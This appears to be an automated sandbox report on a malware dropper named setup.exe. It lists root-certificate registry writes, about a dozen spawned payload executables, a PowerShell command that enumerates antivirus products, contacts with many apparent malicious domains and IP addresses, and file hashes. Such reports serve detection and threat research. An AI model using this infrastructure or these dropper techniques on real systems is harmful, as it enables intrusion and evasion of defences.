e755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\Documents\GuardFox\RYTKJERih9RiuHb9ci7_8U64.exe

"C:\Users\Admin\Documents\GuardFox\RYTKJERih9RiuHb9ci7_8U64.exe"

C:\Users\Admin\Documents\GuardFox\v7aJoARLTh66sOaiUGezYuxG.exe

"C:\Users\Admin\Documents\GuardFox\v7aJoARLTh66sOaiUGezYuxG.exe"

C:\Users\Admin\Documents\GuardFox\3i5ErgHjOmc_JCaxAqA6K_qm.exe

"C:\Users\Admin\Documents\GuardFox\3i5ErgHjOmc_JCaxAqA6K_qm.exe"

C:\Users\Admin\Documents\GuardFox\lxe8ZxGuXmyHRbaShB6RUbK4.exe

"C:\Users\Admin\Documents\GuardFox\lxe8ZxGuXmyHRbaShB6RUbK4.exe"

C:\Users\Admin\Documents\GuardFox\mC_TZP4ew0G67ccshP6WVCpa.exe

"C:\Users\Admin\Documents\GuardFox\mC_TZP4ew0G67ccshP6WVCpa.exe"

C:\Users\Admin\Documents\GuardFox\VCDz5pVhtpsFmmN6mDNqbspt.exe

"C:\Users\Admin\Documents\GuardFox\VCDz5pVhtpsFmmN6mDNqbspt.exe"

C:\Users\Admin\Documents\GuardFox\I10Bs31inqsmkmzmxnpAQrv9.exe

"C:\Users\Admin\Documents\GuardFox\I10Bs31inqsmkmzmxnpAQrv9.exe"

C:\Users\Admin\Documents\GuardFox\2Q4Wh6F8jqNnnf8CvrwTdWMf.exe

"C:\Users\Admin\Documents\GuardFox\2Q4Wh6F8jqNnnf8CvrwTdWMf.exe"

C:\Users\Admin\Documents\GuardFox\391RIFk77lQFvNCj7ssbq8zh.exe

"C:\Users\Admin\Documents\GuardFox\391RIFk77lQFvNCj7ssbq8zh.exe"

C:\Users\Admin\Documents\GuardFox\6kV68bTCnGGv1orebmMiTmwR.exe

"C:\Users\Admin\Documents\GuardFox\6kV68bTCnGGv1orebmMiTmwR.exe"

C:\Users\Admin\AppData\Local\Temp\is-S9O7B.tmp\lxe8ZxGuXmyHRbaShB6RUbK4.tmp

"C:\Users\Admin\AppData\Local\Temp\is-S9O7B.tmp\lxe8ZxGuXmyHRbaShB6RUbK4.tmp" /SL5="$D0122,4124890,54272,C:\Users\Admin\Documents\GuardFox\lxe8ZxGuXmyHRbaShB6RUbK4.exe"

C:\Users\Admin\AppData\Local\Temp\7zS760.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS1EF6.tmp\Install.exe

.\Install.exe /MFFdidt "525403" /S

C:\Users\Admin\AppData\Local\Temp\BFA7.exe

C:\Users\Admin\AppData\Local\Temp\BFA7.exe

C:\Users\Admin\AppData\Local\Temp\BFA7.exe

C:\Users\Admin\AppData\Local\Temp\BFA7.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct

C:\Users\Admin\AppData\Local\Temp\38DD.exe

C:\Users\Admin\AppData\Local\Temp\38DD.exe

Network

Country Destination Domain Proto
DE 77.105.147.130:80 77.105.147.130 tcp
US 8.8.8.8:53 api.myip.com udp
US 172.67.75.163:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 294down-river.sbs udp
US 8.8.8.8:53 vk.com udp
US 8.8.8.8:53 medfioytrkdkcodlskeej.net udp
US 8.8.8.8:53 cleued.com udp
US 8.8.8.8:53 triedchicken.net udp
US 8.8.8.8:53 acenitive.shop udp
US 8.8.8.8:53 cczhk.com udp
US 8.8.8.8:53 monoblocked.com udp
US 8.8.8.8:53 def.bestsup.su udp
RU 147.45.47.101:80 147.45.47.101 tcp
DE 185.172.128.127:80 185.172.128.127 tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
US 104.21.91.214:80 triedchicken.net tcp
US 172.67.154.10:80 cleued.com tcp
US 188.114.97.2:80 acenitive.shop tcp
US 188.114.97.2:80 acenitive.shop tcp
US 104.21.67.206:80 294down-river.sbs tcp
US 172.67.171.112:80 def.bestsup.su tcp
RU 45.130.41.108:80 monoblocked.com tcp
US 104.21.91.214:80 triedchicken.net tcp
US 172.67.154.10:80 cleued.com tcp
US 188.114.97.2:80 acenitive.shop tcp
US 188.114.97.2:80 acenitive.shop tcp
US 104.21.67.206:443 294down-river.sbs tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
US 104.21.91.214:80 triedchicken.net tcp
US 188.114.97.2:80 acenitive.shop tcp
US 172.67.154.10:80 cleued.com tcp
US 188.114.97.2:80 acenitive.shop tcp
RU 45.130.41.108:80 monoblocked.com tcp
US 104.21.91.214:80 triedchicken.net tcp
US 188.114.97.2:80 acenitive.shop tcp
US 172.67.154.10:80 cleued.com tcp
US 188.114.97.2:80 acenitive.shop tcp
US 104.21.91.214:443 triedchicken.net tcp
US 188.114.97.2:443 acenitive.shop tcp
US 188.114.97.2:443 acenitive.shop tcp
US 172.67.154.10:443 cleued.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
AR 190.224.203.37:80 cczhk.com tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
RU 45.130.41.108:80 monoblocked.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
US 8.8.8.8:53 apps.identrust.com udp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
RU 87.240.137.164:80 vk.com tcp
RU 91.215.85.209:443 medfioytrkdkcodlskeej.net tcp
RU 45.130.41.108:80 monoblocked.com tcp
RU 87.240.137.164:80 vk.com tcp
GB 96.17.179.205:80 apps.identrust.com tcp
RU 45.130.41.108:443 monoblocked.com tcp
RU 87.240.137.164:80 vk.com tcp
US 8.8.8.8:53 pergor.com udp
US 172.67.156.81:443 pergor.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 2.19.169.32:80 x2.c.lencr.org tcp
RU 87.240.137.164:80 vk.com tcp
US 8.8.8.8:53 carthewasher.net udp
US 172.67.161.113:443 carthewasher.net tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
AR 190.224.203.37:80 cczhk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
US 8.8.8.8:53 632432.site udp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
NL 194.104.136.64:443 632432.site tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
DE 77.105.147.130:80 77.105.147.130 tcp
US 8.8.8.8:53 iplis.ru udp
US 104.21.63.150:443 iplis.ru tcp
US 8.8.8.8:53 iplogger.org udp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 selebration17io.io udp
DE 185.172.128.24:80 185.172.128.24 tcp
RU 91.215.85.120:80 selebration17io.io tcp
DE 185.220.101.145:10145 tcp
HK 47.56.94.99:9001 tcp
DE 185.220.100.251:9000 tcp
DE 161.97.132.254:9001 tcp
DE 138.2.165.161:9001 tcp
DE 161.97.132.254:9001 tcp
DE 138.2.165.161:9001 tcp
US 8.8.8.8:53 embol.cem udp
US 8.8.8.8:53 embol.cem udp
US 8.8.8.8:53 ulbdech.edu.pe udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 ulbdech.edu.pe udp
US 8.8.8.8:53 gmbol.ce udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 wbzbdee.fr udp
US 8.8.8.8:53 molkywby.cem udp
US 8.8.8.8:53 gmbol.ce udp
US 8.8.8.8:53 gmbol.ce udp
US 8.8.8.8:53 wbzbdee.fr udp
US 8.8.8.8:53 gmbol.ce udp
US 8.8.8.8:53 molkywby.cem udp
US 8.8.8.8:53 molkywby.cem udp
US 8.8.8.8:53 sephobherz.cem udp
US 8.8.8.8:53 sephobherz.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 lobere.oj udp
US 8.8.8.8:53 jhuzderdospbjch.cem udp
US 8.8.8.8:53 jhuzderdospbjch.cem udp
US 8.8.8.8:53 lobere.oj udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 hejmbol.ce.uk udp
US 8.8.8.8:53 spe.kfs.edu.eg udp
US 8.8.8.8:53 hejmbol.fr udp
US 8.8.8.8:53 hejmbol.ce.uk udp
US 8.8.8.8:53 hejmbol.ce.uk udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 spe.kfs.edu.eg udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 spe.kfs.edu.eg udp
US 8.8.8.8:53 ybhee.oz udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 hejmbol.oj udp
US 8.8.8.8:53 hejmbol.ph udp
US 8.8.8.8:53 bbxsbolozgscheel.gr udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 hejmbol.fr udp
US 8.8.8.8:53 mail.ce.uk udp
US 8.8.8.8:53 hejmbol.fr udp
US 8.8.8.8:53 ybhee.oz udp
US 8.8.8.8:53 mail.ce.uk udp
US 8.8.8.8:53 spe-kfs-edu-eg.mail.eo.outlook.com udp
US 8.8.8.8:53 hejmbol.oj udp
US 8.8.8.8:53 hejmbol.oj udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 hejmbol.ph udp
US 8.8.8.8:53 bbxsbolozgscheel.gr udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 hejmbol.ph udp
US 8.8.8.8:53 hejmbol.ph udp

Files

memory/3020-0-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/3020-1-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/3020-2-0x000007FEFD260000-0x000007FEFD2CC000-memory.dmp

memory/3020-3-0x000007FEFD260000-0x000007FEFD2CC000-memory.dmp

memory/3020-4-0x000007FEFD260000-0x000007FEFD2CC000-memory.dmp

memory/3020-5-0x000007FE80010000-0x000007FE80011000-memory.dmp

memory/3020-6-0x00000000003E0000-0x00000000003E1000-memory.dmp

memory/3020-7-0x00000000773F0000-0x0000000077599000-memory.dmp

memory/3020-8-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/3020-9-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/3020-10-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/3020-11-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/3020-12-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/3020-13-0x0000000140000000-0x0000000140B9C000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 8ef9853d1881c5fe4d681bfb31282a01
SHA1 a05609065520e4b4e553784c566430ad9736f19f
SHA256 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA512 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

C:\Users\Admin\AppData\Local\Temp\Cab95DB.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\Tar95EE.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

memory/3020-55-0x0000000140000000-0x0000000140B9C000-memory.dmp

C:\Users\Admin\Documents\GuardFox\3i5ErgHjOmc_JCaxAqA6K_qm.exe

MD5 852f8672ad668dbef934f55b4d098973
SHA1 75713a5a598e5eccb863f6670ff4e5738058a64e
SHA256 5bd8c1d6809b1605876dc47c8a04312ebbbb7fc5d443ea81b1e3665c2fc34428
SHA512 5dadb891221cf37f451e563e775f793146c549390f1cd8524462f000b4ccc7337451997f00f089082674744ba9cd9a387615394f7428f48b69c429587ede0426

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3fd11c12da67032f4efb45aa4f2430a0
SHA1 7086420fbdfe7f6aa0df1d38ea43ceb794e0dab0
SHA256 c304c5484528a4b399db66fbacf0ea87f11ba1f039ab478c133e237616aebb9f
SHA512 c301ccd805cdba7a8ec3e0c0e974daf43e2a13e80016bacf0c6d14305d6787709e62c3c74b6e8a5796e41139b8127a55015253090ef9c1d9f99132aac2424b3e

C:\Users\Admin\Documents\GuardFox\lxe8ZxGuXmyHRbaShB6RUbK4.exe

MD5 c57ebe73a6b34d435d831b2c72452106
SHA1 c8145f14e0ca305c83b2c7f91f0db4e4ed0bee51
SHA256 e61c96de658761a01eb7f66508b488bb3a446d802b3160e961e40dcbe87e5b98
SHA512 0b9969c513540be069d47b5a1f33589ec3972eab5075fc40211febb22352c3c543d64399f933723d14a88923f3dcc756d95238d49c03cc32ce519e5beb89254a

C:\Users\Admin\Documents\GuardFox\VCDz5pVhtpsFmmN6mDNqbspt.exe

MD5 e2ee0e61b44565d7a79e481d3d3de393
SHA1 cc39ff334c7b75de9738fbfe938030b83f0777dd
SHA256 4eb731b188e42830d805b32408aee3146ded8a2beca07677d9734a7beda9c469
SHA512 45f2fcbc1107bd6205b2f23a80c77df8735570590a954784db80476ffca9179299640b7d4c8c61fe2e6ccbf53e6787c34aedd334b6620ab77c3ed62430ce2644

C:\Users\Admin\Documents\GuardFox\391RIFk77lQFvNCj7ssbq8zh.exe

MD5 43abfd80cbfe8afaa65961856640efc4
SHA1 71614b90bb167b289d6d01d3768727eb6ac61ec5
SHA256 f125414e6c33771e07ed5b186e765c5c7cbab090deee72d70af657f1b4abf691
SHA512 bf84a17d811fcd20602a49121731399517e327cf5b1af015d1967af7d741c1b1b03219da0d62b1d9f8abdd800ef7edca83acb7ca909deffdc5023853ea8b540e

C:\Users\Admin\Documents\GuardFox\mC_TZP4ew0G67ccshP6WVCpa.exe

MD5 8b821b8bf586d7b270d8239acc39c0f7
SHA1 4fa149128154c3876109d8d792d3141d82fb93c2
SHA256 10ab3c85b94eb35619c1fff5713fb5641852c8a15d28cf4f37ecafb735bf2aad
SHA512 152fb69f64b3c4b36ac5a42874f5d8a8ad1da98365e19a45cc0d04cb9dbef863eb75c777490c1f305c910ed1a75d129185322aab9b3dcea3bc7cbee24fb6607f

C:\Users\Admin\Documents\GuardFox\6kV68bTCnGGv1orebmMiTmwR.exe

MD5 631393c67cb220cf18796dec2314c118
SHA1 751638c8a1b070b354231a2fd4283f02f303ca94
SHA256 e98c24e3639daa42b133774bce94eb385d68b2a81be6fe460c997c5be900a600
SHA512 b41105af3663da05fd2382735aede37da71a5d85ba1051a7fba03f6beeb556d842015e9977171de3285d7bbe47a41200db8de9748c3b4629d342d013593c07d6

memory/3020-202-0x0000000140000000-0x0000000140B9C000-memory.dmp

C:\Users\Admin\Documents\GuardFox\v7aJoARLTh66sOaiUGezYuxG.exe

MD5 9487f8cfe8666169dbfc5434afd27485
SHA1 a4ee5809469c73857aaecba8f5b2b93cf0032c2f
SHA256 51998723edeff7060be10462f2b6c822335684f8fb5ec77779e6b4ec833b1c0a
SHA512 72be5348e2e1d97c57fdbadb4fd51f49478e901c6b9c202150ab02f1212e7811ac078f19edf790a89a8b6b2fed98776333ddda8b72ec2e31fbd0afe1a6e31c0f

C:\Users\Admin\Documents\GuardFox\I10Bs31inqsmkmzmxnpAQrv9.exe

MD5 a2cd0ee55ac61c65ad6d4be2ef602c18
SHA1 d96591ad585284c13d277d578851ab6293d44310
SHA256 b68e8b42419bc60ff72822495bf99175506668091a58fbd1d11747e039192be7
SHA512 bfee5ab8e75ad1edd98a13bf456da9ccead22c40a518ceacf90f259026cdfc938b7da6003bc4fb79e22720b46d74b308b76fda65f638217af4148984f2aa97ec

C:\Users\Admin\Documents\GuardFox\2Q4Wh6F8jqNnnf8CvrwTdWMf.exe

MD5 e654823683cb9be41044f5a800be69fd
SHA1 d43214c03a47f3b0c77a82eca775d702eaa025e8
SHA256 68abca4995919db0fe3a4e9158062759b2267ebcd8e3036f7eb8e71ed6202c85
SHA512 d20b18482b8f85bfa887495275712527939b388f912eac2388b2c446d4370a87118c01482898316b943667b2525b9b089d44e8e693cc6c5a6d9355ab2d9e6bcc

memory/3020-243-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/3020-244-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/3020-245-0x000007FEFD260000-0x000007FEFD2CC000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9a43908e87a5d68456d9101a793c57df
SHA1 9e1b8b7a124b522084136015ded547c35bc7ad73
SHA256 ec792a75f78c07a590f184b98739433022d28c3c975d41476d5cd3fde3814898
SHA512 c6957b3f14fa84cade63daab710cfc1293d27950b91fecbf8cd433f644927e03570086a302560b273a7235dced1d6389e2e7bf5b3a77e679d6542bcf779ba1bd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1944b0eea0d1fa7ed047abc4da841720
SHA1 12ea39cc0b2b9dd618e48f30884ce229b8fe90c6
SHA256 3a15175ccd17f06bcd25e4f42fd5efa415e847ff76203e9f1f98d07ad4516ef7
SHA512 e129301a9e3fd601068f1311bfb55be111f232970ad6ebe615d46192f10de2f983b244c485ddb8bb251f7eb9ae1f4066c4806d45f4397acda9ab46d06bf1ab7c

